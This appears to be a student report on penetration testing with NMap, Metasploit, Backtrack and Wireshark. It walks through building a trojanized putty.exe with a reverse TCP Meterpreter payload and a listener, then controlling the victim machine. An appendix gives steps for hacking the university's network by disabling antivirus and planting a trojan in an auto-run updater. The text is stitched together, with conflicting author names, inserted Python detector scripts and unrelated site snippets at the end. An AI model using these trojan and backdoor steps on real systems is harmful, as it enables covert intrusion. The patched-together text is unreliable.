Security Assessment and Analysis with Penetration Tools and Wireshark. (Final Draft) Ryan A. Drozdowski. Mike Hannaford.


1 Security Assessment and Analysis with (Final Draft) James Royal Dr. Janusz Zalewski CNT 4104 fall 2012 Networks Florida Gulf Coast University Fort Myers, Florida James Royal Florida Gulf Coast University 1 Page

1. Introduction

Network security is very important, whether for personal or business use: it ensures that the information on these networks isn't accessible to unauthorized users. One must make sure that the information on a network isn't easily accessed without proper permission. Penetration tools are well suited to testing the security of a network because they are very similar to what hackers really use or do, depending on the software. [7] A heavily supported operating system that supports many penetration tools is Backtrack. Although the project uses only a few features of Backtrack, there are many more available. A great starting tool is NMap, which allows someone to map out the activity on the network and alerts the user to possible security issues. [1] Then there is Metasploit, a tool used to perform attacks, also known as exploits, on a certain part of the network. [2] Metasploit can be used to hack into a network and do detrimental things to a computer on that network. Wireshark is a great tool for monitoring and analyzing data transfer. [6] As data travels over a wire or a wireless network, WireShark picks up the packets and makes them available to the user via a sophisticated graphical user interface.

This project is an extension of previous class projects using these three tools (Metasploit, NMap, and WireShark), with the addition of Backtrack 5, an operating system. The following section provides brief introductions to all three tools and discusses the problem addressed in this project and the methods of its solution.

2. Previous Accomplishments

2.1 Metasploit

The previous project's objective was to install Metasploit on a virtual machine to perform penetration testing. With the virtual machines in place, the main goal was to find vulnerabilities and deliver payloads to these virtual machines. Once that test had been completed, the next goal was to test against the Computer Science lab network to see whether vulnerabilities existed and, if so, exploit them.

The project started with downloading Metasploit and basic configuration. The Metasploit application was installed on a Windows platform running Windows 7 x64. For the installation of the Metasploit framework, all firewalls and anti-virus software had to be shut down: because of the nature of penetration testing, the computer you're working on may think you are an intruder and may prevent certain actions. Oracle's VirtualBox was installed as the virtual machine host on the same machine as Metasploit. Once VirtualBox was installed, it ran virtual machines with Ubuntu Linux and Windows XP. The last piece of software installed on the machine was Armitage. Armitage is a user interface for Metasploit that makes it easy to navigate Metasploit, which is natively a command line program. Armitage was downloaded and then set to work on the Metasploit framework installed on this machine.

Armitage, which automatically activates Metasploit, must be started, followed by the virtual machine running the Linux OS. Once both applications are running, the penetration testing is started. Armitage is then used to scan the Computer Science lab network IP address /24 as shown in Figures to display all machines running on the network.

Figure Quick Scan. [4]

Figure Scan range. [4]

Figure After a scan of the network. [4]

With all computers available to attack shown, the virtual machine is running on the local host with IP address The icon of the machine can then be right-clicked to open a drop-down menu and scanned as shown in Figure When the scan completes, all ports identified are shown on the virtual machine as illustrated in Figure Then one can click Attacks on the task bar. When this is done, all the available attacks are shown under the Attacks menu. The exploit tomcat_mgr_deploy can then be selected, and a window appears with the attack information, where all the information is checked before selecting launch as shown in Figure This attack will launch a Meterpreter to communicate with the attacked virtual machine. The Armitage user interface will display the attacked machine with lightning bolts as shown in Figure

Figure Local machine and Metasploitable virtual machine. [4]

Figure Drop down menu options for this machine. Select Scan. [4]

Figure Services tab for Metasploitable machine. [4]

Figure Attack list showing available exploits. [4]

Figure Exploited Metasploitable machine.

A similar attack was attempted on the Florida Gulf Coast University Computer Science Lab Network, which proved to be unsuccessful. This leads to the conclusion that the network had no known vulnerabilities at that time. [4] The main goal of this previous project was achieved, but not the secondary goal, which was penetrating the Computer Science network.

2.2 NMap

The previous project's objective was to use two different applications. The first, NMap, was to detect open ports in the hope of finding vulnerabilities. The second application, SNORT, is an intrusion detection system. With these two applications, the goal was to use NMap to attack a computer on the network while concurrently running SNORT to try to detect the attack done by NMap.

The previous project's goal was to utilize both NMap and SNORT, so it started by attempting to understand the software: both its capabilities and its limitations. Both applications were then tested to make sure they behaved as anticipated. SNORT was the first challenge, and custom SNORT detection rules using a MYSQL server were written. SNORT has a feature that allows a user to write custom detection rules for a particular environment. How NMap would scan the network was then mapped out, as shown in Figure NMap is a command line application with a lot of options; most are available on every network or environment.

Figure NMap plan for attack. [5]

All of this was performed within a virtual environment, with NMap running on Windows 7 and SNORT running on Ubuntu Linux as shown in Figure SNORT was started and the custom rules were imported into the system. Then the NMap application was started. SNORT, running with its custom rules imported, detected and logged all of NMap's scans, even with NMap's flexibility and custom command line scans.

Figure Map of the Network. [5]

The conclusion of this project was that both NMap and SNORT have very useful functionality and flexibility. SNORT could be expanded with a greater set of rules to detect and log far more data, to prevent intrusion and allow for a more secure network.
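The report does not reproduce the custom SNORT rules, so the following Python sketch is an added example and not the project's own rule set. It shows the kind of threshold logic such a rule relies on: one source sending SYNs to many distinct ports within a short window. The log format, addresses, window and threshold are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def build_sample_log():
    """Constructed sample: one scanner sweeping ports, one ordinary client."""
    start = datetime(2012, 11, 5, 10, 0, 0)
    lines = []
    for i, port in enumerate(range(20, 32)):          # 12 ports in 0.6 s
        ts = start + timedelta(milliseconds=50 * i)
        stamp = ts.isoformat(sep=" ", timespec="milliseconds")
        lines.append(f"{stamp} 192.0.2.50 192.0.2.10:{port} S")
    for i, port in enumerate((80, 80, 443, 80)):      # normal browsing over 45 s
        ts = start + timedelta(seconds=15 * i)
        stamp = ts.isoformat(sep=" ", timespec="milliseconds")
        lines.append(f"{stamp} 192.0.2.77 192.0.2.10:{port} S")
    lines.append("malformed line that the parser must skip")
    return sorted(lines)


def parse_line(line):
    """Parse 'date time src dst:port flags'; return None for anything else."""
    parts = line.split()
    if len(parts) != 5:
        return None
    try:
        ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S.%f")
        dst, port = parts[3].rsplit(":", 1)
        return ts, parts[2], dst, int(port), parts[4]
    except ValueError:
        return None


def detect_scans(lines, window=timedelta(seconds=5), threshold=10):
    """Alert once per source that SYNs >= threshold distinct targets in window."""
    recent = defaultdict(deque)     # source -> deque of (timestamp, (dst, port))
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[4] != "S":     # only bare SYN attempts count
            continue
        ts, src, dst, port, _ = rec
        queue = recent[src]
        queue.append((ts, (dst, port)))
        while queue and ts - queue[0][0] > window:   # drop events outside window
            queue.popleft()
        distinct = {target for _, target in queue}
        if len(distinct) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, ts, len(distinct)))
    return alerts


if __name__ == "__main__":
    for src, ts, count in detect_scans(build_sample_log()):
        print(f"possible port scan from {src} at {ts}: {count} distinct targets")
```

Counting distinct targets rather than raw packets keeps a client that repeatedly opens the same service from triggering the alert.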

2.3 Wireshark

The previous WireShark project's primary goal was to set up the software on a Windows-based personal computer in the Computer Science lab along with a USB device called AirPcap [3]. The project was more about understanding the software and all its features, with little implementation, in which useful data were collected and the conclusion was drawn that one could effectively tell what was going on over a wireless network.

WireShark is an open source program downloadable from the web at wireshark.org. One must select which operating system is to be used and then select download. Along with WireShark, another piece of software that must be downloaded and installed is WinPCap. If one follows the on-screen prompts, the installer will ask whether one wishes to install it, so make sure it is selected as shown in Figure

Figure Prompt to download WinPCap. [1]

The next step is to insert the AirPcap USB device. Once inserted, it will prompt to download the driver. This must be done to use the software as shown in Figure Once

all this software has been downloaded, one can launch WireShark and sniff packets over a wireless network.

Figure Prompt to download the AirPcap driver. [1]

With WireShark running, one must select the AirPcap as the interface. Then the scan automatically starts as shown in Figures Once it was running, it was discovered that one could filter the scan either by IP filters or by protocol filters. This was used to limit the scan to only cups, that is, packets using the Common Unix Printing System protocol [1], as shown in Figure After some analysis of the data, Apple computers were singled out and the IP address and the type of printer, as shown in Figure 2.3.6, were displayed.

Figure Select AirPcap as the interface. [1]

Figure Sniffing packets over the network. [1]

Figure The filtered out packets. [1]

Figure Displays the individual packets with their relevant data. [1]

3. Problem Description

Given the four tools described in the previous section, the plan was to attempt to hack into a computer or embedded system over the Computer Science lab wireless network. Each of the three penetration tools (NMap, Metasploit, and WireShark) will be used and will have its own role to play, with the addition of Backtrack [11]. Backtrack's role is to be the intermediary, as it has NMap and Metasploit built into its framework. This software has integrated both programs, making it the top choice for the project to execute a successful attack. Backtrack is installed onto the attacking computer, giving us access to the penetration tools.

NMap's role is to detect and map out all the computers on the wireless network shown in Figure 3.1. NMap gives the potential ability to see IP addresses, open ports, closed ports and the associated operating system of the machine at a given IP address. This constitutes the first part of the project, which is mapping out the network.

Figure Computer Science Wireless Network.

Metasploit is then used to create an exploit that will disguise an attacking program to look like a normal program, for example putty.exe. When this exploit is placed on a USB stick and the user clicks on it and saves the file, they will receive a putty.exe file with the exploit embedded. Once the program putty.exe is launched on the user's computer, it will function like putty.exe, but the exploit will then notify the attacking computer that the file is up and running. This allows some ports to open on that machine so that Metasploit can then penetrate without the knowledge of the user and perform attacks against it.

WireShark can be used for monitoring the attack and watching the data packet exchange. The monitoring can run from the NMap scan, through the exploit being installed, to the attack being performed by Metasploit. With this knowledge, the idea is to see whether an attack can be done on another device and whether the attack could be prevented by determining that certain packet transfers are malicious attacks on the network shown in Figure 3.2.

Figure 3.2 Map of the Attack over the Network - Computer 1 attacking Computer 2 while Computer 5 monitors all packet transfer.

4. Preparation

4.1 NMap the CS Network

NMap is used to map out the Computer Science lab's wireless network. The first task is to analyze the network which is going to be attacked, and NMap is perfect for this task. The first command the project requires is nmap -O /24 as shown in Figure 4.1. This command allows one to see all systems on IP address range /24 and displays their operating systems. These data can be used to customize an exploit to attack the specific computer. The one selected will be a Windows 7 PC with the IP address

Figure 4.1 Command to display operating systems on the IP range /

Running and Setting Up WireShark

WireShark is set up to monitor the Computer Science network effectively and efficiently. The AirPcap drivers need to be installed for this purpose. After installation has completed, the AirPcap has to be inserted in the USB port and the wireless networking card turned off. After all this has been completed, WireShark is ready to start, using the AirPcap as the selected sniffing interface. After several minutes WireShark will have captured about 30,000 data packets over all the wireless networks in the area, so a software filter is needed to narrow down the number of recorded packets. Using the filter ip.src == ip.dst == as shown in Figure 4.2 sorts through the data and finds only data packets sent and received by the computer with IP address , which is a computer running in the Computer Science lab. This filtering command is then saved into WireShark's filtering system. This allows future monitoring of the planned attacks on a computer on the Computer Science wireless network. The same can also be done for the attacking computer.

Figure 4.2 Filtering out ip address as the source and destination.

4.3 Backtrack Setup

Backtrack is the operating system used in this project to facilitate the attacks. It is saved on a USB stick so that it can be used on any computer. To launch the operating system, one must first go into the BIOS of the computer and change the system boot order so that the USB is first in the order. Once that has been completed, the boot screen will ask one to confirm booting from USB. Once the operating system is booted on the computer, there is another boot screen from Backtrack. The option that must be selected is Backtrack's persistent text mode boot. Then a command prompt appears, and the desktop is started with startx. Once it has finished loading, the Backtrack operating system is ready to use as shown in Figure

Customizing an Exploit using Metasploit

Figure 4.3 Backtrack desktop screen.

Metasploit is a built-in application within the Backtrack operating system. To start Metasploit, one must open the Konsole window. Once the Konsole window is open, the command msfconsole must be entered. This will launch the Metasploit console as shown in Figure 4.4. If at any time one needs help in the Metasploit window, the command help can be entered.

Figure 4.4 Metasploit framework.

To create an exploit, one must first know what payload one wishes to use. For the project we used NMap and found a Windows 7 PC, so the selected payload was reverse TCP. To create this exploit one must type use payload/windows/meterpreter/reverse_tcp as shown in Figure 4.5. Once the payload is loaded into Metasploit, type show options to see what is required for this payload as shown in Figure 4.6. This will show that the LHOST and LPORT must be set. The LHOST is the listening computer's IP address and the LPORT is the port that the computer will be listening on. To set the LHOST type set LHOST = To set the LPORT type set LPORT = Those are the attributes of our attacking

computer. With these properties set, one can create the exploit. The exploit can be attached to any executable; the chosen program was putty.exe. To generate this infected program type generate -k -t exe -x /tmp/putty.exe -f /tmp/putty_pro.exe as shown in Figure 4.7. The -k -t exe tells the exploit generator that the program being generated will have the extension exe. The -x /tmp/putty.exe tells the exploit generator the source file path. The -f /tmp/putty_pro.exe tells the exploit generator the new executable's name and file path. Once the file is created, type back to exit the payload menu and return to the main menu within Metasploit.

Figure 4.5 Loading the reverse TCP payload.

Figure 4.6 Shows options for the payload.

Figure 4.7 Generates the infected executable.

Now that the exploit has been created, it is time to launch the listener for that exploit. Type use exploit/multi/handler as shown in Figure 4.8; this brings up the screen where one can listen for the exploit. Once again, one must set both the LHOST and LPORT to the IP address and the port number that were selected for the payload as shown in Figure 4.9. Once that has been completed, type exploit to launch the listener and wait for the program, as shown in Figure

Figure 4.8 Launches the exploit handler.

Figure 4.9 Sets the listening host.

Figure 4.10 Starts to listen for the exploit.

5. Implementation

5.1 Methodology

Reverse TCP

The reverse TCP connection is usually used to bypass firewall restrictions on open ports. The firewall usually blocks inbound connections to open ports, but does not block outgoing traffic. In a normal forward connection, a client connects to a server through the server's open port, but in the case of a reverse connection, the client opens the port that the server connects to. The most common way a reverse connection is used is to bypass firewall and router security restrictions.

Trojan Horse

The Trojan Horse is an executable running on the computer behind a firewall. It can open an outgoing connection to an external source. Once the connection is made, one can send commands to that computer.

Man in the Middle

Another benefit of using Backtrack is the use of Ettercap. Ettercap is a piece of software which makes initiating a man in the middle attack easy. A man in the middle attack is the process of routing all data packets on the specified network through a given computer on the network before sending them out to the Internet. This attack allows the computer initiating the attack to validate packets and reroute them as needed. A malicious example of this would be if some of the users of the network used the network to do their online banking. The user generating the man in the middle attack wants all usernames and passwords for the users on the network attempting to access Bank of America's website. The user generating the man in

the middle attack would then sift through all the data packets on the network, rerouting the packets with the destination IP address of Bank of America's website to a different desired destination IP which serves a clone of the Bank of America website. The end user has no knowledge of the reroute and would continue to enter their login credentials as usual. Once the user hits the submit button, the attacker gains their private information.

Daemon

This project makes use of Metasploit in order to generate Payloads. Metasploit comes with several Payloads for one to use, but also has the ability to generate them if one needs to. This is where Daemons come into play in this project. Daemons are essentially background processes in operating systems. They are scripts that run in the background. They are headless, meaning they do not contain a graphical user interface. A daemon is like a small program running in the operating system that the end user does not see. Daemons can be configured to start when the operating system boots, and shut down when the operating system terminates.

This project creates a Payload that is disguised as the open source putty.exe application that is used as an SSH and FTP client. The Payload, which is the customized putty.exe application, looks, feels, and executes exactly like the putty.exe application downloaded from the Internet. The only difference is that when one opens this generated Payload (putty.exe) file on the target system, the Payload sends a reverse TCP connection back to the attacking system, which allows the attacking system access to the target system. The issue with this is that the attacking system only has access as long as our payload is running on the target system. Once the user of the target system exits the Payload, it closes the reverse TCP connection. Daemons make creating a back door into the target system a breeze.
A back door is the process of creating an entry point on the target system so that the

user of the attacking system can gain access to it any time they want. This would remove the limitation of our Payload described in the previous paragraph. In order to create a back door on the target system, one would need to gain super user privileges on the target system. This can be achieved with some of the other tools Backtrack provides but is out of the scope of this project. This is to inform one about the process of creating a back door. Once one has super user privileges on the target system, they would simply need to view the processes running on the target. Our Payload is generated as a system process on the target system. One is the true putty.exe application and the other is the reverse TCP connection back to the attacking computer. By creating a daemon, the reverse TCP connection is activated when the targeted computer system starts and stopped when the system shuts down. One could gain access to the target system any time of the day, as long as it was turned on, without the need for the Payload's execution.

Exploit and Payloads

Once the best vulnerability has been discovered in a network, a small and specialized computer program, called an exploit, is used to take advantage of the vulnerability and give the penetration tester access to the computer system. The exploits are used to deliver the payloads to the target system. These payloads are the way that the penetration tester gains access to the computer. Payloads are introduced in the next paragraph. There are approximately over 180 exploits in the Metasploit Framework. Since the security community is encouraged to get involved in the continuing development of exploits, there is currently a public database of usable exploits. The exploit database is constantly being updated by community support, and when new exploits are found they are posted. [4]

Payloads are pieces of code that get executed on the target system as part of an exploit attempt.
A payload is usually a sequence of assembly instructions which helps achieve a specific post-exploitation objective, such as adding a new

user to the remote system, or launching a command prompt and binding it to a local port. Traditionally, payloads were created from scratch or by modifying existing pieces of assembly code. This requires an in-depth knowledge not only of assembly programming, but also of the internal workings of the target operating system. But a number of scripts now enable payloads to be developed without needing to modify any assembly code at all.

The different types of payloads allow for different types of control the penetration tester has over the target system. The most commonly used payload is called the Meterpreter. This payload allows the penetration tester to turn on the target system's webcam, take control of the mouse and keyboard, and even take screenshots. All of these options are for the penetration tester to see exactly what holes there are in the system. Having access to key functions on one computer may not necessarily mean control over the whole network, but it is a start in determining which aspects of the network are the most vulnerable. [4]

Backtrack 5

Backtrack Linux is a version of an open source Linux operating system that is licensed under the GPL open source license. Backtrack is used by network professionals in the industry and is considered the standard operating system for digital forensics and penetration testing. The operating system is named after the well-known backtracking algorithm, and its current version is Backtrack 5 r3, which is the version that this project is using.
Backtrack comes with Metasploit and NMap completely installed in the standard ISO image download, as well as with many other great tools for penetration testing, such as Aircrack-ng, which enables the ability to crack WEP and WPA wireless passwords; Snort, which enables the ability to sniff out packets on a given network; Kismet, which is an intrusion detection system; Ophcrack, which is a Windows password cracker that uses LM hashes through rainbow tables;

and Ettercap, which is specifically designed for man in the middle attacks. These are just a handful of the great penetration applications that come with Backtrack. All of these tools are integrated deep into the operating system, which allows for ease of use when it comes to testing a specified network. One can install some of these tools on other operating systems, but most of the tools listed here are designed to work best with Backtrack. If one must take on the task of penetration testing of any network, one is encouraged to use Backtrack Linux as the preferred operating system to do so. Backtrack makes the use of these programs easy and straightforward without the need to customize an operating system of choice in order to use these programs.

The benefit of using Backtrack is that it is easily installed onto a USB drive. Because Backtrack is based on Linux, the specified hardware requirements are not as demanding as for a standard operating system. Backtrack can run on 512 megabytes of RAM and only consumes about 1 gigabyte of hard drive space. Given this requirement, one can easily install Backtrack onto a USB drive and boot into the operating system from just about any computer on any network. This operating system can allow someone with malicious intent to take down an enterprise system and destroy or compromise valuable data like credit card information and private information such as social security numbers, and now, with the advancement of GPS systems, one could obtain location information if they were searching for someone with the intent to do bodily harm.

5.2 Testing Experiments

For all the test cases, the preparation described in previous sections has not changed: the attacking computer is already in the listening stage and the Wireshark computer is already sniffing. The assumption is that all the directions given in the previous sections have been completed. The experiment requires three computers.
The first is the computer with Backtrack running the exploit with IP address The next is

the computer being attacked wirelessly with IP address Last, the third computer has to run Wireshark to sniff the wireless packets. These three computers are referred to as the exploit computer, the attacked computer and the Wireshark computer. They are all in their respective waiting stages as shown in Figures The exploit computer is listening at IP on port The attacked computer is about to click on the putty_pro.exe application. Wireshark is scanning packets with the filter ip.src == ip.dst ==

Figure 5.1: Exploit computer listening on IP and port

Figure 5.2: Attacked computer, with application to be clicked.

Figure 5.3: Wireshark computer sniffing wireless packets with a filter in place.

The first step is to make a connection, so the user of the attacked computer clicks on the putty_pro.exe application. Once that has been done, the exploit computer is connected as shown in Figure 5.4. Then Wireshark will detect the connection as shown in Figure 5.5.

Figure 5.4: Exploit computer makes the reverse TCP connection.
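The Python sketch below is an added example, not part of the original report. It applies the source-or-destination host filter from the WireShark setup to raw frames and then uses the TCP three-way handshake to show which side opened each connection, which is what marks the reverse TCP connection described under Methodology. All addresses, ports, the `||` joining the two filter terms and the allowlist of expected outbound ports are constructed assumptions, since the report's own values are not shown.

```python
import socket
import struct

TCP_SYN, TCP_ACK = 0x02, 0x10
ALLOWED_OUTBOUND_PORTS = {53, 80, 443}   # assumption: services this site expects


def build_frame(src, dst, sport, dport, flags, ethertype=b"\x08\x00"):
    """Build a minimal Ethernet/IPv4/TCP frame (constructed sample data)."""
    eth = b"\x02\x00\x00\x00\x00\x01" + b"\x02\x00\x00\x00\x00\x02" + ethertype
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    return eth + ip + tcp


def handshake(client, cport, server, sport):
    """Frames of a completed three-way handshake started by `client`."""
    return [build_frame(client, server, cport, sport, TCP_SYN),
            build_frame(server, client, sport, cport, TCP_SYN | TCP_ACK),
            build_frame(client, server, cport, sport, TCP_ACK)]


def build_sample_capture():
    """Constructed capture; every address and port is a placeholder."""
    frames = []
    frames += handshake("192.0.2.10", 49152, "192.0.2.20", 50000)   # host dials out
    frames += handshake("192.0.2.10", 49153, "198.51.100.5", 443)   # ordinary HTTPS
    frames += handshake("192.0.2.30", 49154, "192.0.2.40", 22)      # unrelated hosts
    # Inbound SYN that is never answered (e.g. dropped by the host firewall).
    frames.append(build_frame("192.0.2.20", "192.0.2.10", 40000, 445, TCP_SYN))
    # Non-IPv4 ethertype: the parser must skip it.
    frames.append(build_frame("192.0.2.10", "192.0.2.1", 0, 0, 0, ethertype=b"\x08\x06"))
    return frames


def parse_frame(frame):
    """Return (src, dst, sport, dport, flags) for IPv4/TCP frames, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None                          # not IPv4 over Ethernet
    ihl = (frame[14] & 0x0F) * 4
    if frame[14] >> 4 != 4 or ihl < 20 or frame[23] != 6:
        return None                          # bad header or not TCP
    tcp_off = 14 + ihl
    if len(frame) < tcp_off + 14:
        return None                          # truncated TCP header
    src = socket.inet_ntoa(frame[26:30])
    dst = socket.inet_ntoa(frame[30:34])
    sport, dport = struct.unpack("!HH", frame[tcp_off:tcp_off + 4])
    return src, dst, sport, dport, frame[tcp_off + 13]


def matches_host(pkt, host):
    """Same selection as the display filter ip.src == host || ip.dst == host."""
    return pkt[0] == host or pkt[1] == host


def completed_handshakes(frames, host):
    """Completed TCP handshakes involving `host`, with the side that sent the SYN."""
    pending = {}     # (client, cport, server, sport) -> "syn" or "synack"
    results = []
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt is None or not matches_host(pkt, host):
            continue
        src, dst, sport, dport, flags = pkt
        syn, ack = flags & TCP_SYN, flags & TCP_ACK
        if syn and not ack:
            pending[(src, sport, dst, dport)] = "syn"
        elif syn and ack and pending.get((dst, dport, src, sport)) == "syn":
            pending[(dst, dport, src, sport)] = "synack"
        elif ack and not syn and pending.get((src, sport, dst, dport)) == "synack":
            del pending[(src, sport, dst, dport)]
            results.append({"initiator": src, "responder": dst, "port": dport})
    return results


def unexpected_outbound(frames, host, allowed_ports=ALLOWED_OUTBOUND_PORTS):
    """Connections the monitored host opened to ports outside the allowlist."""
    return [c for c in completed_handshakes(frames, host)
            if c["initiator"] == host and c["port"] not in allowed_ports]


if __name__ == "__main__":
    for conn in unexpected_outbound(build_sample_capture(), "192.0.2.10"):
        print("review outbound connection:", conn)
```

Because the monitored host sends the SYN, an inbound-only firewall rule never sees the connection as an incoming one; reviewing who initiated each handshake is what surfaces it.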

Figure 5.5: Wireshark computer sees the packets that make the connection.

Once the connection has been created, one can issue commands, all of which can be found in the Appendix or by typing ? into the exploit computer. The first command used by the exploit computer is ps as shown in Figure 5.6. The output shows all the processes running on the attacked computer. The attacked computer has no knowledge of this command being executed. Wireshark will detect the TCP packets transferred between the exploit computer and the attacked computer as shown in Figure 5.7.

Figure 5.6: Exploit computer entering ps command showing all processes on the targeted computer.

Figure 5.7: Wireshark computer shows TCP packets that were captured the moment after the command ps.

With the processes displayed on the exploit computer, one can select an ID to kill the process as shown in Figure 5.8. The process that is going to be killed is 5040, which is Internet Explorer on the attacked computer as shown in Figure 5.9. After typing kill 5040 on the exploit computer as shown in Figure 5.10, Internet Explorer on the attacked computer will close as shown in Figure Wireshark will capture the TCP packets that are sent to execute the kill command as shown in Figure This is the end of the experiment.

Figure 5.8: Exploit computer selects the process to kill.

Figure 5.9: Attacked computer has Internet Explorer window open.

Figure 5.10: Exploit computer killing process ID 5040 or Internet Explorer.

Figure 5.11: Attacked computer showing that Internet Explorer was killed by the exploit computer.

Figure 5.12: Wireshark computer captured the packets moments after the kill command is executed.

6. Conclusion

Security assessment and analysis are complex concepts and require complex tools such as Backtrack, NMap, Metasploit, and Wireshark. NMap is a great tool for preliminary testing, such as finding a system to attack or just seeing what's on the network, but it offers little beyond a starting point. Wireshark is a similar tool, since it monitors packets over a wired or wireless network. It won't directly tell anything, but it might alert users to a possible threat. Backtrack, with the Metasploit framework built in, carries the bulk of the penetration testing, as it allows one to test and see, for example, whether your antivirus is any good, among other things. Separately, none of these software tools would have been useful, but together they allow for very practical applications.

The Metasploit exploit yielded success in allowing full control over the attacked computer. It also allowed the viewing of all running processes. One can then use commands to kill selected processes. With this, some other hacks may be performed, such as the one described in Appendix A. This may lead someone to try other exploits. The limitation of Metasploit is only the user's knowledge of the network and the systems running on it.

Wireshark yielded some success, but it didn't tell much about the attack on the wireless computer. What it did show was a lot of communication between the two computers, as well as the fact that none of the TCP packets were transmitted 100%, which shouldn't be the case in a normal environment. For Wireshark to work functionally, one would have to have an in-depth understanding of the network and its behaviors; otherwise one would never gather useful information from all the packets.

Further advancement for this type of project would be to investigate the other exploits and perhaps find a way to spread the exploit to multiple computers quickly. NMap and Metasploit have more capabilities than those described in this project.
Backtrack also supports different penetration testing tools, such as Aircrack-ng, which is used to crack WEP and WPA passwords. Furthermore, other tools, such as Nessus, could be added to expand the project.

Appendix A: Steps for performing a hack on FGCU's network

Step one: Stopping the antivirus on the computer. This can be done with a couple of simple system calls made by a C++ program, as proven by Chris Ruskai, who wrote a simple C++ program that suspended the antivirus and then disabled it.

Step two: Place infected program on computer. Create an exploit as described in the previous section for a program that runs automatically, for example the Java updater. This allows your attack to go completely unnoticed. Then shut down the computer.

Step three: Wait for connection. Once the computer is started, the Trojan will be launched and your listening computer will then have complete access.

Notes: Although this will allow you complete access to the computer and its systems, you only have about a one-minute time slot before the antivirus is launched again over the network. If you study the system well enough, once it launches again it can be killed from the meterpreter before it removes the Trojan.
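A defender's view of the sequence in Appendix A, as an added example that is not part of the original report: the steps leave a recognizable pattern in host telemetry, namely an antivirus process stopped, a reboot, and an outbound connection made while the antivirus is still down. The event schema, host names, process names and addresses below are constructed assumptions; map them to whatever your endpoint logging actually records.

```python
from dataclasses import dataclass
from datetime import datetime

# Constructed sample telemetry (not taken from the report).
# Format: <timestamp> <host> <event> <process> [remote endpoint]
SAMPLE_EVENTS = """\
2012-11-05T09:00:00 LAB-PC3 boot -
2012-11-05T09:00:50 LAB-PC3 proc_start av_agent.exe
2012-11-05T09:03:00 LAB-PC3 net_out updater.exe 198.51.100.20:443
2012-11-05T10:00:00 LAB-PC5 boot -
2012-11-05T10:00:30 LAB-PC5 net_out sync.exe 192.0.2.44:443
2012-11-05T10:00:55 LAB-PC5 proc_start av_agent.exe
2012-11-05T14:01:10 LAB-PC7 proc_stop av_agent.exe
2012-11-05T14:02:30 LAB-PC7 shutdown -
2012-11-05T14:05:00 LAB-PC7 boot -
2012-11-05T14:05:20 LAB-PC7 net_out updater.exe 192.0.2.10:8443
2012-11-05T14:06:05 LAB-PC7 proc_start av_agent.exe
2012-11-05T14:06:40 LAB-PC7 proc_stop av_agent.exe
2012-11-05T14:07:00 LAB-PC7 net_out updater.exe 192.0.2.10:8443
"""


@dataclass
class Finding:
    host: str
    time: datetime
    process: str
    remote: str
    severity: str


def parse(text):
    """Turn the whitespace-separated sample lines into time-ordered tuples."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip blank or malformed lines
        ts, host, kind, proc = parts[:4]
        remote = parts[4] if len(parts) > 4 else ""
        events.append((datetime.fromisoformat(ts), host, kind, proc, remote))
    return sorted(events)


def detect(events, av_process="av_agent.exe"):
    """Flag outbound connections made while the antivirus is not running.

    severity "high":   the antivirus was stopped on a running machine, either
                       just now or before the reboot that preceded the connection
    severity "medium": connection in the normal gap between boot and antivirus
                       start, with no earlier sign of tampering
    """
    state = {}
    findings = []
    for ts, host, kind, proc, remote in events:
        st = state.setdefault(
            host, {"av_up": True, "killed": False, "tampered_boot": False}
        )
        if kind == "proc_stop" and proc == av_process:
            st["av_up"] = False
            st["killed"] = True  # stopped while the host was still up
        elif kind == "boot":
            st["av_up"] = False
            st["tampered_boot"] = st["killed"]  # remember tampering across reboot
            st["killed"] = False
        elif kind == "proc_start" and proc == av_process:
            st["av_up"] = True
            st["killed"] = False
            st["tampered_boot"] = False
        elif kind == "net_out" and not st["av_up"]:
            tampered = st["killed"] or st["tampered_boot"]
            findings.append(
                Finding(host, ts, proc, remote, "high" if tampered else "medium")
            )
    return findings


if __name__ == "__main__":
    for f in detect(parse(SAMPLE_EVENTS)):
        print(f"{f.time.isoformat()} {f.host} {f.severity:6} {f.process} -> {f.remote}")
```

The second LAB-PC7 finding corresponds to the note above about the antivirus being killed again after it relaunches; the LAB-PC5 case shows why the boot-to-antivirus gap alone is only a medium signal.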

Appendix B: Exploit Commands

Figure A.1 Core Commands.
Figure A.2 File System Commands.
Figure A.3 Networking Commands.
Figure A.4 System Commands.
Figure A.5 User Interface Commands.
Figure A.6 Webcam Commands.
Figure A.7 Elevate Commands.
Figure A.8 Passwords Database Commands.
Figure A.9 Timestomp Commands.


7. References

[1] Marsh, N. NMap Cookbook, CreateSpace Independent Publishing Platform, Lexington, KY, August,
[2] Kennedy, D., O'Gorman, J., Kearns, D., and Aharoni, M. Metasploit: The Penetration Tester's Guide, No Starch Press, San Francisco, 2011
[3] Gehring, J. WireShark, FGCU, 2011, URL:
[4] Steiner, C. Metasploit, FGCU, 2011, URL:
[5] Carestia, E. NMap and SNORT, FGCU, 2011, URL:
[6] Wireshark, October, 2012, URL:
[7] Agle, M. A Penetration Tester's Toolkit, Linux Journal, vol., no., pp , January, 2012, URL: linuxjournal.com
[8] Mudge, R. Live-fire security testing with Armitage and Metasploit, vol., no., pp , May, 2011, URL: linuxjournal.com
[9] NMap User Documentation, 2012, URL:
[10] WireShark Display Filters, October, 2012, URL:
[11] Backtrack 5, 2012, URL:


More information

DumpsTorrent. Latest dumps torrent provider, real dumps

DumpsTorrent.   Latest dumps torrent provider, real dumps DumpsTorrent http://www.dumpstorrent.com Latest dumps torrent provider, real dumps Exam : GCIH Title : GIAC Certified Incident Handler Vendor : GIAC Version : DEMO Get Latest & Valid GCIH Exam's Question

More information

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd.

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd. Today s challenge on Wireless Networking David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd. Agenda How Popular is Wireless Network? Threats Associated with Wireless Networking

More information

